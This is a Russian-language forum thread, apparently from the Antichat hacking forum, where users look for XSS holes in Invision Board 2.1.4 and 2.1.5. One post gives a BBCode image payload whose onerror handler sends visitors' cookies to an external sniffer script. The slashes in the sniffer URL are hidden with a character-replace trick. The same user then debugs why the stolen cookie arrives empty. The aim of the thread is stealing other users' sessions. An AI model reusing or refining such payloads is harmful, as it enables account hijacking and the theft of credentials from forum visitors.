Форум АНТИЧАТ - Уязвимость для Ibp 2.1.4.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Уязвимость для Ibp 2.1.4. (https://forum.antichat.xyz/showthread.php?t=16198)

Уязвимость для Ibp 2.1.4.

Люди плиз подскажите есть ли какие нибудь уязвимости ( Желательно Xss) для форумов Ibp 2.1.4.?
Заранее спасибо.

мляяяяя
http://www.google.com/custom?hl=en&i...CURITY.NNOV.ru

КОГДА ЭТО ЗАКОНЧИТСЯ??? :mad:

ТУТ смотри....

Спасибо, надо бы это добавить в топик про полный анализ Ibp, а то я там и искал.
Но возникла проблема.
После вставки этого кода

Код HTML:

[img]/[snapback]        onerror=document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63)+document.cookies        tyle=visibility:hidden=        [/snapback].gif[/img]

Приходят куки на сниффер, но в поле QUERY пишет undefined

Код HTML:

QUERY=undefined

И еще можно тупой вопрос?
У нас есть

Код HTML:

http:xxantichat.ruxcgi-binxs.jpg/

Тут заменен слэш на X, я смотрел различные кодировки для него, но нигде не видел код в виде буквы X. Где можно поподробней про это прочитать?

Вот здесь можно прочитать подробнее:

Цитата:

.source.replace(/x/g,String.fromCharCode(47))

Понял, сенксь...

а для форума Ibp 2.1.5. кто нить знает уязвимость?

Так никто не знает почему куки неизвестны? Это случайно не хорошо настроенный Internet Explorer?